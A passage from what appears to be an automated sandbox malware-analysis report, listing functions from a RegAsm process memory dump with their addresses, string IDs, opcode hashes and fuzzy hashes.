                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B
                                                                      • API String ID: 0-3806887055
                                                                      • Opcode ID: 881487b94f34c037e028dc03176547ea1a1a34661b7e3cdf011bdcf23930bfef
                                                                      • Instruction ID: dda79431a7a381354eb7992f4da0d9bb5ed59ed8d5ad5917760c71f259a4ecc9
                                                                      • Opcode Fuzzy Hash: 881487b94f34c037e028dc03176547ea1a1a34661b7e3cdf011bdcf23930bfef
                                                                      • Instruction Fuzzy Hash: 0BA11972A087258BC718CF29D89172EB7E2ABC8304F49867DE9969B381DB74DC05C7C5
                                                                      Function 00434A2F Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J(Z4
                                                                      • API String ID: 0-2186490230
                                                                      • Opcode ID: fe18fcb45f5b366845e43e8746b6da6e8f3690878024a1e1d554e777e3f5da93
                                                                      • Instruction ID: 0c3c6397971fbf39b577ab5acef299f8a17aa32554bf44bf17e31ec2f091a3f2
                                                                      • Opcode Fuzzy Hash: fe18fcb45f5b366845e43e8746b6da6e8f3690878024a1e1d554e777e3f5da93
                                                                      • Instruction Fuzzy Hash: 2CA16C70408B808AE7768F39C090BE3BBE1AF5A304F54585ED4EB87782D779B445CB29
                                                                      Function 00448BE0 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: 4`[b
                                                                      • API String ID: 2994545307-3962175265
                                                                      • Opcode ID: 7c1ffdfd6f211eb12630ce37f48f9216b1596631e01dcc04855e3016ddde93aa
                                                                      • Instruction ID: 97e95ed95cf941e068c77a71b6c165310a897e915d1a1d564e8b1cc4d5c8788d
                                                                      • Opcode Fuzzy Hash: 7c1ffdfd6f211eb12630ce37f48f9216b1596631e01dcc04855e3016ddde93aa
                                                                      • Instruction Fuzzy Hash: F191C271A08301AFE720DB15DC81B6FB7E5EB85354F54482EF99897392EB38D840CB5A
                                                                      Function 0044B300 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: MNOP
                                                                      • API String ID: 0-783613192
                                                                      • Opcode ID: f8a5d3031550570b0cd3a611d554af8d361d789c8380b98dc8553ef19e6847e4
                                                                      • Instruction ID: 4c1b4c4b2e9fef75eb940f9395f2579c141d9abd29664ce630b25ef7d8d63037
                                                                      • Opcode Fuzzy Hash: f8a5d3031550570b0cd3a611d554af8d361d789c8380b98dc8553ef19e6847e4
                                                                      • Instruction Fuzzy Hash: 8B81B1342083059FE724DF29D880A2BB7E5FF95758F15892DE9858B352E738DC10CB9A
                                                                      Function 0044B020 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: MNOP
                                                                      • API String ID: 0-783613192
                                                                      • Opcode ID: 3063f0f3f91d937777957b0289bf54ae34d1396810db12015069148717f2f1fe
                                                                      • Instruction ID: c4d83a5c95ce541db8a93265b5430b6c419164ec9e2e4709dc0e36d878027cf6
                                                                      • Opcode Fuzzy Hash: 3063f0f3f91d937777957b0289bf54ae34d1396810db12015069148717f2f1fe
                                                                      • Instruction Fuzzy Hash: B381BC306083009BE710DF58D891A2FB7E2FF85744F29886DE5858B361D779EC14CB9A
                                                                      Function 0040A910 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,
                                                                      • API String ID: 0-3772416878
                                                                      • Opcode ID: 099c236fabada8b29b28883a6f7eb927403c60f5a05debc96164d27c11e3c7e8
                                                                      • Instruction ID: 7ea4ec8df7d1af157694dad0b2ddc26a51abc3d6e2c2cc4320e6490357c9b214
                                                                      • Opcode Fuzzy Hash: 099c236fabada8b29b28883a6f7eb927403c60f5a05debc96164d27c11e3c7e8
                                                                      • Instruction Fuzzy Hash: 32B127712083819FD325CF18C98461BFBE0AFA9704F444E2EE5D997782D635E918CBA7
                                                                      Function 00445AD0 Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 7654
                                                                      • API String ID: 0-4024152101
                                                                      • Opcode ID: be504536f038416e1d4edb752feac5bc805885ba2f8544c8c01de497c5e423c1
                                                                      • Instruction ID: 7a35ab28fd0a26b3948bf9f86ec2e013bb52480a85e17a240ad3ac06b8b658d9
                                                                      • Opcode Fuzzy Hash: be504536f038416e1d4edb752feac5bc805885ba2f8544c8c01de497c5e423c1
                                                                      • Instruction Fuzzy Hash: 4371E2716087419FEB15DF19C8C0B2BB7E6EF95314F18892EE99487392D238DC41CB5A
                                                                      Function 00414E26 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: SYA
                                                                      • API String ID: 0-4212776672
                                                                      • Opcode ID: 254f8b39bebb99d8ee5dccbeeadc484bb52319231fde44bda6536d8f9a50c579
                                                                      • Instruction ID: 7f879d4623d2c1102999ce86527e4d96d2f3d10b350c70f3ee8129f928f6a44f
                                                                      • Opcode Fuzzy Hash: 254f8b39bebb99d8ee5dccbeeadc484bb52319231fde44bda6536d8f9a50c579
                                                                      • Instruction Fuzzy Hash: D761A1B5A00700DFD7259F25E880A63B7F5FB95319F144A3DE08683762E739E885CB89
                                                                      Function 004489F0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4`[b
                                                                      • API String ID: 0-3962175265
                                                                      • Opcode ID: b5d023d62257a4c626440ddb3117fef597bce6b0240d556e5d7ff713d1724dd0
                                                                      • Instruction ID: b495b082d3e908edfd00f2f56cc7232502cc61b4d3337edbb305c0ef107e636d
                                                                      • Opcode Fuzzy Hash: b5d023d62257a4c626440ddb3117fef597bce6b0240d556e5d7ff713d1724dd0
                                                                      • Instruction Fuzzy Hash: BD514671608340AFE7149E09CC91B2FB7E6EB85725F188A2DF8D957391CA39EC01C796
                                                                      Function 00444970 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 7654
                                                                      • API String ID: 0-4024152101
                                                                      • Opcode ID: 901b10082cde7f28194df08ba5b3adeadc5b986e246d2c14ebb31e824fbb1a25
                                                                      • Instruction ID: 6b218af450866b0fe99af1f7c51bb86148964a482ba403d1030a703d4783f96c
                                                                      • Opcode Fuzzy Hash: 901b10082cde7f28194df08ba5b3adeadc5b986e246d2c14ebb31e824fbb1a25
                                                                      • Instruction Fuzzy Hash: 3851CE742083409BE724DF14E880B2BBBE5EBC5305F18882EE9C997311D739EC10DB2A
                                                                      Function 0040E470 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 0040E5F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                      • API String ID: 0-2471034898
                                                                      • Opcode ID: ddfdc7149270ff1530b2289e1383d721dd78681f1bfb949ebe86f553123317ed
                                                                      • Instruction ID: ccc2d30e64e97e097d375ac0de9d2e22b727f45c33e366729a74f9b94a1f59d5
                                                                      • Opcode Fuzzy Hash: ddfdc7149270ff1530b2289e1383d721dd78681f1bfb949ebe86f553123317ed
                                                                      • Instruction Fuzzy Hash: 98514E37A0A5A14BC3244E3E5C112A5AA460BA3334F2D8F77EDF5A73E1D12E4C264399
                                                                      Function 0042DFE0 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B
                                                                      • API String ID: 0-3806887055
                                                                      • Opcode ID: dee7b1dee9328862052ad57725f35d79540aff3160e94df7c436ace43865785c
                                                                      • Instruction ID: 733f38e918fcb2dd5270b8569c0c3cc3d088bc41a3ce343992b8dfccbbb99759
                                                                      • Opcode Fuzzy Hash: dee7b1dee9328862052ad57725f35d79540aff3160e94df7c436ace43865785c
                                                                      • Instruction Fuzzy Hash: BB512C72F147358BC714CE2DD89072AB2D2ABC8305F8A467DDC5A9B382DE349C1587D5
                                                                      Function 0044AC00 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: MNOP
                                                                      • API String ID: 0-783613192
                                                                      • Opcode ID: f4242dfef2de233e48016e83545519aca856ea02bbfc6a89d7122ee86ff49502
                                                                      • Instruction ID: ee6679273abafb4133ad51ca82e03e062317397a14a93a1c8e4187433cc692b4
                                                                      • Opcode Fuzzy Hash: f4242dfef2de233e48016e83545519aca856ea02bbfc6a89d7122ee86ff49502
                                                                      • Instruction Fuzzy Hash: E141C374648300AFF7549B14D881B2BB7A6EB85715F24882EF98947352D339DC20CB5B
                                                                      Function 0044AD90 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: MNOP
                                                                      • API String ID: 0-783613192
                                                                      • Opcode ID: 5ced491ab1452905e1841d7bcce19d88781f5803ed5ce9cf4ca693d6db50da8a
                                                                      • Instruction ID: 0a56d986e06c91ed8a12d7fa27a988aa33714531a5a76d730050ec92aa7a375b
                                                                      • Opcode Fuzzy Hash: 5ced491ab1452905e1841d7bcce19d88781f5803ed5ce9cf4ca693d6db50da8a
                                                                      • Instruction Fuzzy Hash: BB418134688340AFF714DB15D881B2BB7A6EB85715F24882DF99997352C339DC20CB5B
                                                                      Function 00424490 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 80
                                                                      • API String ID: 0-1093746208
                                                                      • Opcode ID: 4d4fbab07c48a99c042bb332d07d745ff509867459e940bfbc226f5f481d4cde
                                                                      • Instruction ID: 3ec4b7595a72ad0e68ed4e3a28ec28138072276a7513f2fb7a742c8147458005
                                                                      • Opcode Fuzzy Hash: 4d4fbab07c48a99c042bb332d07d745ff509867459e940bfbc226f5f481d4cde
                                                                      • Instruction Fuzzy Hash: 412191746083109BD310AF18D951A2BB7F4EF96764F85491DE4D59B391E338C940CBAB
                                                                      Function 0040BF80 Relevance: .9, Instructions: 852COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93c2a19666413ab9f400d1b7872a03c7fc96242e82f21e6db902c6c79d7bdab7
                                                                      • Instruction ID: 9a407bdc96c74e76d92ed5144f8a4fe6f1f4e12db280666d0dd749b8afd0197b
                                                                      • Opcode Fuzzy Hash: 93c2a19666413ab9f400d1b7872a03c7fc96242e82f21e6db902c6c79d7bdab7
                                                                      • Instruction Fuzzy Hash: 30529C32518711CBC725DF18D48066BB3E2FFD4304F298A3ED9D6A7295D339A851CB8A
                                                                      Function 0040B470 Relevance: .7, Instructions: 670COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e250b38837fd4715581710c8edbcd8addf5a3626a2f5f82d9d280fee6d3a6ce6
                                                                      • Instruction ID: 642af7f9f4cc5c3a0bb655affbc7381b50852d66d18f9bbee6aa8b5c7dd6b660
                                                                      • Opcode Fuzzy Hash: e250b38837fd4715581710c8edbcd8addf5a3626a2f5f82d9d280fee6d3a6ce6
                                                                      • Instruction Fuzzy Hash: 98528070A087848FE7359B24C4847A7BBE1EB91314F14893EC5E656BC2C37DA885C79E
                                                                      Function 00407470 Relevance: .7, Instructions: 657COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc0350b755ec659348fbe488e8fd628042ee9f5c1c3e63c7348debc874760767
                                                                      • Instruction ID: 6f34d658e8bf016dbeb144df8a802002908009c297ca34febf58999a114b199a
                                                                      • Opcode Fuzzy Hash: cc0350b755ec659348fbe488e8fd628042ee9f5c1c3e63c7348debc874760767
                                                                      • Instruction Fuzzy Hash: 4052B531A0C3458FCB15CF14C0906AABBE1BF85314F198A7EE89967391D778E949CF86
                                                                      Function 00449E60 Relevance: .6, Instructions: 592COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 990ef5858da270fcd5c714f1cbe9946898f94eece37d7b40759dc2b22a897ddf
                                                                      • Instruction ID: b09a89ab5c6bd6caec74fff7b76334741940ee79584cb71c8e44f9d779eadac0
                                                                      • Opcode Fuzzy Hash: 990ef5858da270fcd5c714f1cbe9946898f94eece37d7b40759dc2b22a897ddf
                                                                      • Instruction Fuzzy Hash: 5412BB31A08251CFDB04CF68D8A066FBBF1EF8A315F19882EE58597392D735D910CB96
                                                                      Function 00407E70 Relevance: .6, Instructions: 592COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 455a2def3cd4607b69d4b082b196bca4304fdf693d3f57c27b18c8d8b9c72b05
                                                                      • Instruction ID: d8883f6032b0fcb3f38433067063a771a19ae62be6b80c3b146bdb5a26dcf8d1
                                                                      • Opcode Fuzzy Hash: 455a2def3cd4607b69d4b082b196bca4304fdf693d3f57c27b18c8d8b9c72b05
                                                                      • Instruction Fuzzy Hash: A2320470915B118FC368CF29C69052ABBF1BF85710B604A2ED6D797B90DB3AF845CB18
                                                                      Function 00409737 Relevance: .5, Instructions: 536COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 25a37c5f3b2a29ae68063d4fa164d6ca2caf11f32dc11329077550f3d7966334
                                                                      • Instruction ID: f47fbb57d13c9069d1454bbcb43e8b3ccbc00d4dd581e02e1339e424f1ba8f71
                                                                      • Opcode Fuzzy Hash: 25a37c5f3b2a29ae68063d4fa164d6ca2caf11f32dc11329077550f3d7966334
                                                                      • Instruction Fuzzy Hash: F632623520D380EFC350CF28D880B5FBBE2AF99305F44896DF585962A2D375D968CB5A
                                                                      Function 00447EDE Relevance: .5, Instructions: 476COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4c3c3a21c1b2ee73e811332f6a8e1be64b185d4f77f219ba96861ff91651a30
                                                                      • Instruction ID: 5549ba11c2e90eb234b7c5423a8fbfb4a77ff2f39bf50e673c9bd4f9aa49bd64
                                                                      • Opcode Fuzzy Hash: a4c3c3a21c1b2ee73e811332f6a8e1be64b185d4f77f219ba96861ff91651a30
                                                                      • Instruction Fuzzy Hash: 9D02EDB5A18255CFDB10CF68E8906BEBBB1FF09322F144579D851A7392C339E941CB94
                                                                      Function 0040A3C0 Relevance: .4, Instructions: 448COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0537d3602b05352d162d47d3b37e8bd64bb5caa79fc0b4c4570d86523830f7e
                                                                      • Instruction ID: 3dfa834cc95e5c00a0169a4d3e9d9aa564f73bc0227f910f465499f90f335f9d
                                                                      • Opcode Fuzzy Hash: e0537d3602b05352d162d47d3b37e8bd64bb5caa79fc0b4c4570d86523830f7e
                                                                      • Instruction Fuzzy Hash: 94F1D036608341CFC724CF29C88166BFBE2AFD9304F08892DE4C597791E679E859CB56
                                                                      Function 00409A02 Relevance: .3, Instructions: 334COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e47e641f6539b63304e02ccc8e37126c79fa7862bb363966f8b44626d7d288a8
                                                                      • Instruction ID: e9468965110a56bb6032bd079094f40f30306602c7693c164a2ba2fb52d1037e
                                                                      • Opcode Fuzzy Hash: e47e641f6539b63304e02ccc8e37126c79fa7862bb363966f8b44626d7d288a8
                                                                      • Instruction Fuzzy Hash: 4FE1363520D380EFC350CF28D88064FBBE1AFD9305F48896DF489972A2D674DA65CB5A
                                                                      Function 0040AFD0 Relevance: .3, Instructions: 315COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1403e308c14c929368f100250f5dbe3fa0503215152504074aca5edbc24086c7
                                                                      • Instruction ID: 0f752fb7c09d9405a44515831a65da3327b3eea3726c8d910d67014fc478ec9c
                                                                      • Opcode Fuzzy Hash: 1403e308c14c929368f100250f5dbe3fa0503215152504074aca5edbc24086c7
                                                                      • Instruction Fuzzy Hash: FEC158B2A087518FC320CF28C8967ABB7E0EF85318F08492DD5D9D7342D778A555CB8A
                                                                      Function 00449970 Relevance: .3, Instructions: 304COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 07db187edf6147d719a46b6995ef8d341e827bc120329527b02f881573074e8e
                                                                      • Instruction ID: 3abc21bc3e95f8a3451e8ced2770bdd05b99c4f40b96798a60550f29323ea1a7
                                                                      • Opcode Fuzzy Hash: 07db187edf6147d719a46b6995ef8d341e827bc120329527b02f881573074e8e
                                                                      • Instruction Fuzzy Hash: D6A1DF75A04246CFDB00CF68E8A166FB7B1FB49312F194479D945A7362C334ED50CB95
                                                                      Function 004146B5 Relevance: .3, Instructions: 277COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c87b0577a19f319f0e9110632791b19f836fd9125dd7ec814634750cc2e76d1
                                                                      • Instruction ID: 30348db68d5ad48780b53f830896320fa6a754e42e300085adc231b94485e5cf
                                                                      • Opcode Fuzzy Hash: 0c87b0577a19f319f0e9110632791b19f836fd9125dd7ec814634750cc2e76d1
                                                                      • Instruction Fuzzy Hash: 13A149B45107419FD3218F29D880B57FBF1EF5A304F24491EE4D997392E33AA894CB99
                                                                      Function 00413AE6 Relevance: .3, Instructions: 274COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ce6abbaf5585abdbf9dd583f7fadd13d82129c0f32841ca5fd319ead2268f8f
                                                                      • Instruction ID: 63722bcf266d008e4d2fb854599f640af6bf96e83537b373199111c124b4d8f9
                                                                      • Opcode Fuzzy Hash: 3ce6abbaf5585abdbf9dd583f7fadd13d82129c0f32841ca5fd319ead2268f8f
                                                                      • Instruction Fuzzy Hash: 2E917C716007418FD321CF28D880B67BBF2EF56305F24492ED49697352E739E985CB98
                                                                      Function 00448F80 Relevance: .3, Instructions: 263COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4cfbc533af8237bfb87faf514cffbbcd245806f9c3fcdb4a2b25e3d0f958fb9c
                                                                      • Instruction ID: a865c3e9e599e2c5329ba543cd513e4d394582e1008898d159b2fc64aeb1c2dc
                                                                      • Opcode Fuzzy Hash: 4cfbc533af8237bfb87faf514cffbbcd245806f9c3fcdb4a2b25e3d0f958fb9c
                                                                      • Instruction Fuzzy Hash: A5811BB2A042106BF724AA29DC4577B76D9EBC0318F04493EF999D7342EA78EC058756
                                                                      Function 00415078 Relevance: .3, Instructions: 251COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d573fe2f6a3767f09d46f836eae65ef577eb19577032d8ef79d8b00ea0b12847
                                                                      • Instruction ID: 252b9328507afdb69cb8149bd6720b98ca481bb8e256363331bcbe9542f63dac
                                                                      • Opcode Fuzzy Hash: d573fe2f6a3767f09d46f836eae65ef577eb19577032d8ef79d8b00ea0b12847
                                                                      • Instruction Fuzzy Hash: 64818AB0A00701DFD321DF29D880A66B7F5FF9A304F14496EE58687752E339E845CBA9
                                                                      Function 0042F5B7 Relevance: .2, Instructions: 218COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
